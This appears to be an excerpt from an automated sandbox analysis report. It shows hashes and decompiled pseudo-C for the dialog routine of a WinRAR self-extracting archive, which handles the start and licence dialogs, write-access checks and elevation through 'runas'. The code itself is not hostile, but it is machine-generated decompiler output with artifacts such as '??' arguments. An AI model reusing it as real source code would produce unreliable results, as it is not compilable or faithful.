                                            • Instruction ID: 355e3bd087f799498bbf2d4f27efc98d870b9f1e3bb5b0e2021aca761498d2f1
                                            • Opcode Fuzzy Hash: f8e21460349b5263ce62a1ac53a3d00b791fa6ce05f06eab9fd5973c9ba04f3a
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4A5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00C4A5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E00C4D870(E00C614F6, _t321);
				E00C4D940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E00C312D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E00C4C343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0xc7b704;
						_t277 = 1;
						 *0xc775d8 = _t302;
						 *0xc775c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xc85d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00C495F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0xc79602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0xc79602;
						if( *0xc79602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E00C49A32(_t308); // executed
						_push(0xc775e4);
						_push(0xc775e0);
						_push(0xc8ce18);
						_push(_t302);
						 *0xc775d6 = 0; // executed
						_t114 = E00C49EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xc775d1 = _t277;
						}
						__eflags =  *0xc775e4;
						if( *0xc775e4 > 0) {
							_push(7);
							_push( *0xc775e0);
							_push(_t302);
							E00C4B4C7(_t299);
						}
						__eflags =  *0xc8de20;
						if( *0xc8de20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E00C3DA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E00C3DA42(_t286, 0xbe));
						}
						__eflags =  *0xc775e4;
						if( *0xc775e4 <= 0) {
							L103:
							__eflags =  *0xc775d6;
							if( *0xc775d6 != 0) {
								L114:
								__eflags =  *0xc795fc - 2;
								if( *0xc795fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0xc785f8;
								if( *0xc785f8 != 0) {
									E00C31294(_t302, 0x67, 0);
									E00C31294(_t302, 0x66, 0);
								}
								_t115 =  *0xc795fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xc775d7;
									if( *0xc775d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0xc6df38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xc775d1;
								if( *0xc775d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E00C3DA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xc8ce0c;
							if( *0xc8ce0c != 0) {
								goto L114;
							}
							__eflags =  *0xc795fc;
							if( *0xc795fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E00C3FA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E00C3FA89(__eflags, _t321 - 0x9688, E00C3DA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0xc8de20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xc8de20;
								if( *0xc8de20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0xc775e8; // 0x0
							E00C48FE6(_t286, __eflags,  *0xc70064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0xc775e0);
							_push(_t302); // executed
							E00C4B4C7(_t299); // executed
							_t133 =  *0xc8ce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xc795fc;
								if(__eflags == 0) {
									_t288 =  *0xc775e8; // 0x0
									E00C48FE6(_t288, __eflags,  *0xc70064,  *(_t321 + 0x14), _t133, 0, 0);
									L00C52B4E( *0xc8ce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0xc795fc - _t277;
							if( *0xc795fc == _t277) {
								L102:
								_push(_t277);
								_push( *0xc775e0);
								_push(_t302);
								E00C4B4C7(_t299);
								goto L103;
							} else {
								 *0xc6df3c(_t302);
								__eflags =  *0xc795fc - _t277;
								if( *0xc795fc == _t277) {
									goto L102;
								}
								__eflags =  *0xc79601;
								if( *0xc79601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xc775e0);
								_push(_t302);
								E00C4B4C7(_t299);
								__eflags =  *0xc8de18;
								if( *0xc8de18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xc70064, L"LICENSEDLG", 0, E00C4A3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xc775d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xc775d0;
						if( *0xc775d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0xc775d0;
							if( *0xc775d0 == 0) {
								__eflags =  *0xc775d1;
								if( *0xc775d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0xc775cc;
									_t279 = _t152;
									if( *0xc775cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0xc622e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0xc785f8;
									if( *0xc785f8 == 0) {
										E00C3FAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E00C4C10F(_t285, _t321 - 0x1164, _t312);
										E00C33E41(_t321 - 0x4288, 0x880, E00C3DA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E00C3DA42(_t285, 0xba);
									}
									E00C4C190(0, _t163);
									__eflags =  *0xc79601;
									if( *0xc79601 == 0) {
										E00C4C7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E00C39D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E00C49A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0xc79601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0xc775dc = _t277;
													E00C312B2(_t302, 0x67, 0);
													E00C312B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E00C3DA42(_t285, 0xe6)); // executed
													E00C312B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0xc622e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xc775e0);
													_push(_t302);
													E00C4B4C7(_t300);
													_push(2);
													_push( *0xc775e0);
													_push(_t302);
													E00C4B4C7(_t300);
													_push(0xc8ce18);
													_push(_t302);
													 *0xc8fe3c = _t277; // executed
													E00C4C6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0xc775e0);
													 *0xc8fe3c = 0;
													_push(_t302);
													E00C4B4C7(_t300);
													__eflags =  *0xc775d7;
													if( *0xc775d7 == 0) {
														__eflags =  *0xc775cc;
														if( *0xc775cc == 0) {
															__eflags =  *0xc8de2c;
															if( *0xc8de2c == 0) {
																_push(4);
																_push( *0xc775e0);
																_push(_t302);
																E00C4B4C7(_t300);
															}
														}
													}
													E00C31294(_t302, _t277, _t277);
													 *0xc775dc =  *0xc775dc & 0x00000000;
													__eflags =  *0xc775dc;
													_t182 =  *0xc775d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E00C3DA42(_t285, 0x9a));
														E00C33E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E00C36E03(0xc700e0, _t277);
														E00C49735(_t302, _t321 - 0x5688, E00C3DA42(0xc700e0, 0x96), 0x30);
														 *0xc775cc =  *0xc775cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0xc7b602;
												E00C3E7AA(0xc7b602, _t321 - 0x164, 0x80);
												_push(0xc7a602);
												E00C33E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0xc775f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0xc85d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00C3FAB1(0xc85d0a, _t231, 0x2000);
													}
													E00C4A24E(_t285, 0xc89d0a, 7);
													E00C4A24E(_t285, 0xc8ad0a, 2);
													E00C4A24E(_t285, 0xc8bd0a, 0x10);
													 *0xc8ce0b = _t277;
													_t285 = 0xc8cd0a;
													E00C3E90C(_t277, 0xc8cd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00C4EA80(_t238, 0xc85d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E00C3E957(_t321 - 0x164, 0x80);
												E00C3E957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0xc6df20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xc8de2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E00C33E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E00C3943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E00C39528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00C3946E(_t321 - 0x3188); // executed
											_t285 =  *0xc79601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0xc775d7 = 1;
									L75:
									__eflags =  *0xc775cc;
									if( *0xc775cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xc775d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E00C3DA42(_t285, 0x90));
									_t290 =  *0xc700e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00C3DA42(_t290, 0x96);
									E00C49735(_t302, E00C3DA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0xc775d1;
							if( *0xc775d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xc8fe3c;
						if( *0xc8fe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0xc8fe3d;
							_t254 = _t149 & 0xffffff00 |  *0xc8fe3d == 0x00000000;
							__eflags = _t254;
							 *0xc8fe3d = _t254;
							_t255 = E00C3DA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0xc8fe3d;
								if( *0xc8fe3d == 0) {
									goto L125;
								}
								__eflags =  *0xc775d7;
								if( *0xc775d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0xc775dc;
						 *0xc775d7 = 1;
						if( *0xc775dc == 0) {
							goto L12;
						}
						__eflags =  *0xc775cc;
						if( *0xc775cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00C31217(_t302, E00C3DA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}























































                                            0x00c4a5d1
                                            0x00c4a5d1
                                            0x00c4a5d6
                                            0x00c4a5e0
                                            0x00c4a5e6
                                            0x00c4a5ea
                                            0x00c4a5ee
                                            0x00c4a607
                                            0x00c4a611
                                            0x00c4a611
                                            0x00c4a617
                                            0x00c4acb3
                                            0x00c4acb8
                                            0x00c4acbf
                                            0x00c4acc0
                                            0x00c4acc6
                                            0x00c4accc
                                            0x00c4acce
                                            0x00c4acd8
                                            0x00c4acd8
                                            0x00c4acde
                                            0x00c4ace3
                                            0x00c4ace5
                                            0x00c4acf2
                                            0x00c4acf2
                                            0x00c4ad01
                                            0x00c4ad10
                                            0x00c4ad13
                                            0x00c4ad25
                                            0x00c4ad2d
                                            0x00c4ad2f
                                            0x00c4ad37
                                            0x00c4ad39
                                            0x00c4ad3c
                                            0x00c4ad41
                                            0x00c4ad43
                                            0x00c4ad43
                                            0x00c4ad4b
                                            0x00c4ad52
                                            0x00c4ad57
                                            0x00c4ad5c
                                            0x00c4ad61
                                            0x00c4ad66
                                            0x00c4ad67
                                            0x00c4ad6e
                                            0x00c4ad73
                                            0x00c4ad75
                                            0x00c4ad77
                                            0x00c4ad77
                                            0x00c4ad7d
                                            0x00c4ad84
                                            0x00c4ad86
                                            0x00c4ad88
                                            0x00c4ad8e
                                            0x00c4ad8f
                                            0x00c4ad8f
                                            0x00c4ad94
                                            0x00c4ad9b
                                            0x00c4adab
                                            0x00c4adbe
                                            0x00c4adbe
                                            0x00c4adc4
                                            0x00c4adcb
                                            0x00c4ae7c
                                            0x00c4ae7c
                                            0x00c4ae83
                                            0x00c4af2c
                                            0x00c4af2c
                                            0x00c4af33
                                            0x00c4af38
                                            0x00c4af38
                                            0x00c4af3e
                                            0x00c4af45
                                            0x00c4af4c
                                            0x00c4af56
                                            0x00c4af56
                                            0x00c4af5b
                                            0x00c4af60
                                            0x00c4af62
                                            0x00c4af64
                                            0x00c4af6b
                                            0x00c4af6d
                                            0x00c4af6f
                                            0x00c4af70
                                            0x00c4af75
                                            0x00c4af76
                                            0x00c4af78
                                            0x00c4af82
                                            0x00c4af7a
                                            0x00c4af7a
                                            0x00c4af7a
                                            0x00c4af78
                                            0x00c4af6b
                                            0x00c4af88
                                            0x00c4af8f
                                            0x00c4af9e
                                            0x00c4af9e
                                            0x00000000
                                            0x00c4af8f
                                            0x00c4ae89
                                            0x00c4ae90
                                            0x00000000
                                            0x00000000
                                            0x00c4ae96
                                            0x00c4ae9d
                                            0x00000000
                                            0x00000000
                                            0x00c4aea3
                                            0x00c4aea5
                                            0x00c4aeaa
                                            0x00c4aeb1
                                            0x00c4aeb1
                                            0x00c4aeb7
                                            0x00c4aec2
                                            0x00c4aec2
                                            0x00c4aec8
                                            0x00c4aed3
                                            0x00c4aee4
                                            0x00c4aefc
                                            0x00000000
                                            0x00c4aefc
                                            0x00c4aeca
                                            0x00c4aed1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4aed1
                                            0x00c4aeb9
                                            0x00c4aec0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4af01
                                            0x00c4af01
                                            0x00c4af02
                                            0x00c4af02
                                            0x00c4af0a
                                            0x00c4af24
                                            0x00c4af29
                                            0x00000000
                                            0x00c4add1
                                            0x00c4add1
                                            0x00c4add3
                                            0x00c4add9
                                            0x00c4adda
                                            0x00c4addf
                                            0x00c4ade4
                                            0x00c4ade6
                                            0x00c4ade8
                                            0x00c4adef
                                            0x00c4adf1
                                            0x00c4ae05
                                            0x00c4ae10
                                            0x00c4ae15
                                            0x00c4ae15
                                            0x00c4adef
                                            0x00c4ae16
                                            0x00c4ae1c
                                            0x00c4ae6f
                                            0x00c4ae6f
                                            0x00c4ae70
                                            0x00c4ae76
                                            0x00c4ae77
                                            0x00000000
                                            0x00c4ae1e
                                            0x00c4ae1f
                                            0x00c4ae25
                                            0x00c4ae2b
                                            0x00000000
                                            0x00000000
                                            0x00c4ae2d
                                            0x00c4ae34
                                            0x00000000
                                            0x00000000
                                            0x00c4ae36
                                            0x00c4ae38
                                            0x00c4ae3e
                                            0x00c4ae3f
                                            0x00c4ae44
                                            0x00c4ae4b
                                            0x00000000
                                            0x00000000
                                            0x00c4ae61
                                            0x00c4ae67
                                            0x00c4ae69
                                            0x00c4a75d
                                            0x00c4a75d
                                            0x00c4a763
                                            0x00c4a763
                                            0x00c4a687
                                            0x00c4a688
                                            0x00c4afa4
                                            0x00c4afa4
                                            0x00c4afa6
                                            0x00c4afac
                                            0x00c4afb6
                                            0x00c4afb6
                                            0x00000000
                                            0x00c4ae69
                                            0x00c4ae1c
                                            0x00c4adcb
                                            0x00c4a61d
                                            0x00c4a620
                                            0x00c4a634
                                            0x00c4a634
                                            0x00000000
                                            0x00c4a634
                                            0x00c4a625
                                            0x00c4a625
                                            0x00c4a628
                                            0x00c4a693
                                            0x00c4a69a
                                            0x00c4a732
                                            0x00c4a732
                                            0x00c4a742
                                            0x00c4a748
                                            0x00c4a74f
                                            0x00c4a769
                                            0x00c4a770
                                            0x00c4a784
                                            0x00c4a78a
                                            0x00c4a791
                                            0x00c4a793
                                            0x00c4a7a5
                                            0x00c4a7b4
                                            0x00c4a7b6
                                            0x00c4a7b6
                                            0x00c4a7bc
                                            0x00c4a7c2
                                            0x00c4a7c9
                                            0x00c4a7e6
                                            0x00c4a7f3
                                            0x00c4a816
                                            0x00c4a81b
                                            0x00c4a81e
                                            0x00c4a7cb
                                            0x00c4a7d0
                                            0x00c4a7d0
                                            0x00c4a827
                                            0x00c4a82c
                                            0x00c4a833
                                            0x00c4a83c
                                            0x00c4a83c
                                            0x00c4a841
                                            0x00c4a84b
                                            0x00c4a84c
                                            0x00c4a84f
                                            0x00c4a85c
                                            0x00c4a85d
                                            0x00c4a85f
                                            0x00c4a872
                                            0x00c4a87e
                                            0x00c4a880
                                            0x00c4a883
                                            0x00c4a885
                                            0x00c4a898
                                            0x00c4a898
                                            0x00c4a89b
                                            0x00c4a89b
                                            0x00c4a8a1
                                            0x00c4a8a3
                                            0x00c4a912
                                            0x00c4a912
                                            0x00c4a916
                                            0x00c4ab5a
                                            0x00c4ab60
                                            0x00c4ab6a
                                            0x00c4ab82
                                            0x00c4ab88
                                            0x00c4ab95
                                            0x00c4aba0
                                            0x00c4aba2
                                            0x00c4aba4
                                            0x00c4abaf
                                            0x00c4abaf
                                            0x00c4abb8
                                            0x00c4abb8
                                            0x00c4abbe
                                            0x00c4abc0
                                            0x00c4abc6
                                            0x00c4abc7
                                            0x00c4abcc
                                            0x00c4abce
                                            0x00c4abd4
                                            0x00c4abd5
                                            0x00c4abda
                                            0x00c4abdf
                                            0x00c4abe0
                                            0x00c4abe6
                                            0x00c4abeb
                                            0x00c4abed
                                            0x00c4abf3
                                            0x00c4abfa
                                            0x00c4abfb
                                            0x00c4ac00
                                            0x00c4ac07
                                            0x00c4ac09
                                            0x00c4ac10
                                            0x00c4ac12
                                            0x00c4ac19
                                            0x00c4ac1b
                                            0x00c4ac1d
                                            0x00c4ac23
                                            0x00c4ac24
                                            0x00c4ac24
                                            0x00c4ac19
                                            0x00c4ac10
                                            0x00c4ac2c
                                            0x00c4ac31
                                            0x00c4ac31
                                            0x00c4ac38
                                            0x00000000
                                            0x00c4ac38
                                            0x00c4a91c
                                            0x00c4a923
                                            0x00c4a923
                                            0x00c4a926
                                            0x00c4a926
                                            0x00c4a928
                                            0x00c4a92c
                                            0x00c4a92e
                                            0x00c4aaf0
                                            0x00c4aaf0
                                            0x00c4aaf4
                                            0x00c4ab04
                                            0x00c4ab1d
                                            0x00c4ab2b
                                            0x00c4ab45
                                            0x00c4ab4a
                                            0x00c4ab4a
                                            0x00c4a685
                                            0x00c4a685
                                            0x00000000
                                            0x00c4a685
                                            0x00c4a942
                                            0x00c4a953
                                            0x00c4a959
                                            0x00c4a95e
                                            0x00c4a97b
                                            0x00c4a980
                                            0x00c4a983
                                            0x00c4a990
                                            0x00c4a997
                                            0x00c4a9a0
                                            0x00c4a9b8
                                            0x00c4a9bb
                                            0x00c4a9c2
                                            0x00c4a9c5
                                            0x00c4a9c8
                                            0x00c4a9d5
                                            0x00c4a9d7
                                            0x00c4a9da
                                            0x00c4a9dc
                                            0x00c4aa67
                                            0x00c4a9e2
                                            0x00c4a9e2
                                            0x00c4a9e9
                                            0x00c4a9ef
                                            0x00c4a9f1
                                            0x00c4a9fe
                                            0x00c4a9fe
                                            0x00c4aa0a
                                            0x00c4aa16
                                            0x00c4aa22
                                            0x00c4aa2d
                                            0x00c4aa34
                                            0x00c4aa39
                                            0x00c4aa57
                                            0x00c4aa5a
                                            0x00c4aa5f
                                            0x00c4aa5f
                                            0x00c4aa6e
                                            0x00c4aa82
                                            0x00c4aa93
                                            0x00c4aa98
                                            0x00c4aa9a
                                            0x00c4aad4
                                            0x00c4aad7
                                            0x00000000
                                            0x00c4aa9c
                                            0x00c4aaa4
                                            0x00c4aaaa
                                            0x00c4aaaa
                                            0x00c4aaaa
                                            0x00c4aaae
                                            0x00c4aab1
                                            0x00c4aab1
                                            0x00c4aab4
                                            0x00000000
                                            0x00000000
                                            0x00c4aab8
                                            0x00c4aac1
                                            0x00c4aac2
                                            0x00c4aac5
                                            0x00c4aac8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4aac8
                                            0x00c4aacd
                                            0x00c4aada
                                            0x00c4aada
                                            0x00c4aade
                                            0x00c4aae1
                                            0x00c4aaea
                                            0x00c4aaea
                                            0x00000000
                                            0x00c4aade
                                            0x00c4aa9a
                                            0x00c4a8a5
                                            0x00c4a8a7
                                            0x00000000
                                            0x00000000
                                            0x00c4a8c1
                                            0x00c4a8c6
                                            0x00c4a8cf
                                            0x00c4a8d4
                                            0x00c4a8de
                                            0x00c4a8e0
                                            0x00c4a8e7
                                            0x00c4a8ec
                                            0x00c4a8ef
                                            0x00c4a8f1
                                            0x00c4a8f3
                                            0x00c4a8f5
                                            0x00c4a8f8
                                            0x00c4a8fa
                                            0x00c4a8fa
                                            0x00c4a8f8
                                            0x00c4a8fd
                                            0x00c4a8fd
                                            0x00c4a8fd
                                            0x00c4a907
                                            0x00c4a90c
                                            0x00000000
                                            0x00c4a90c
                                            0x00c4a887
                                            0x00c4a889
                                            0x00c4a88c
                                            0x00c4a88f
                                            0x00000000
                                            0x00000000
                                            0x00c4a891
                                            0x00c4a893
                                            0x00000000
                                            0x00c4a861
                                            0x00c4a861
                                            0x00c4a863
                                            0x00c4a866
                                            0x00c4a86d
                                            0x00c4a86f
                                            0x00000000
                                            0x00c4a86f
                                            0x00c4a868
                                            0x00c4a86b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4a86b
                                            0x00c4a772
                                            0x00c4a774
                                            0x00c4a775
                                            0x00c4a777
                                            0x00c4ac3d
                                            0x00c4ac3d
                                            0x00c4ac44
                                            0x00000000
                                            0x00000000
                                            0x00c4ac4a
                                            0x00c4ac4c
                                            0x00000000
                                            0x00000000
                                            0x00c4ac57
                                            0x00c4ac65
                                            0x00c4ac6b
                                            0x00c4ac71
                                            0x00c4ac74
                                            0x00c4ac7f
                                            0x00c4ac89
                                            0x00c4ac89
                                            0x00c4ac8e
                                            0x00c4ac91
                                            0x00c4ac76
                                            0x00c4ac76
                                            0x00c4ac76
                                            0x00c4ac9a
                                            0x00c4aca8
                                            0x00000000
                                            0x00c4aca8
                                            0x00c4a770
                                            0x00c4a753
                                            0x00c4a754
                                            0x00c4a75b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4a75b
                                            0x00c4a6a0
                                            0x00c4a6a7
                                            0x00000000
                                            0x00c4a6ad
